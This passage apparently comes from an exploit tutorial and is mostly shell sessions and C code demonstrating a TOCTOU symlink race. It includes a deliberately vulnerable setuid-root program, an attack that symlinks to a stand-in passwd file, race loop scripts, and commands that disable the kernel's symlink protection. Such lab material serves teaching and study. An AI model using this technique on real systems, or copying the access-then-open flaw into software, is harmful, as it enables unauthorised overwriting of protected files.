Excuse the ads! We need some help to keep our site up.
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ mkdir etc lazenca0x0@ubuntu:~/Exploit/RaceCondition$ cd etc lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ echo Only Root! > passwd lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ cat passwd Only Root! lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ sudo chown root:root passwd lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ sudo chmod 644 passwd lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ ls -al passwd -rw-r--r-- 1 root root 13 Jun 26 00:46 passwd lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ cd .. lazenca0x0@ubuntu:~/Exploit/RaceCondition$ echo > file |
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> void main() { int fd; char *file = "./file"; char buffer[]="Success!! Race Condition : lazenca.0x0\n"; if (!access(file, W_OK)) { printf("Able to open file %s.\n",file); fd = open(file, O_WRONLY); write(fd, buffer, sizeof(buffer)); close(fd); }else{ //printf("Unable to open file %s.\n",file); } } |
#include <stdio.h> #include <stdlib.h> #include <unistd.h> void main() { unlink("file"); symlink("./etc/passwd","file"); } |
#!/bin/bash while : do ./vuln done |
#!/bin/bash CHECK_FILE="ls -l ./etc/passwd" old=$($CHECK_FILE) new=$($CHECK_FILE) while [ "$old" == "$new" ] do ./attack new=$($CHECK_FILE) done echo "Success! The passwd file has been changed" |
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ gcc -o vuln vuln.c lazenca0x0@ubuntu:~/Exploit/RaceCondition$ sudo chown root:root vuln lazenca0x0@ubuntu:~/Exploit/RaceCondition$ sudo chmod 4755 ./vuln lazenca0x0@ubuntu:~/Exploit/RaceCondition$ gcc -o attack attack.c |
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ sudo sysctl -w fs.protected_symlinks=0 lazenca0x0@ubuntu:~/Exploit/RaceCondition$ ./run.sh Able to open file ./file. Able to open file ./file. Able to open file ./file. ... |
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ ./race.sh Success! The passwd file has been changed lazenca0x0@ubuntu:~/Exploit/RaceCondition$ cat ./etc/passwd Success!! Race Condition : lazenca.0x0 lazenca0x0@ubuntu:~/Exploit/RaceCondition$ |
Ubuntu 12.04 $ sudo sysctl -w kernel.yama.protected_sticky_symlinks=0 Ubuntu 16.04 $ sudo sysctl -w fs.protected_symlinks=0 |
Ubuntu 12.04 $ sudo sysctl -w kernel.yama.protected_sticky_symlinks=1 Ubuntu 16.04 $ sudo sysctl -w fs.protected_symlinks=1 |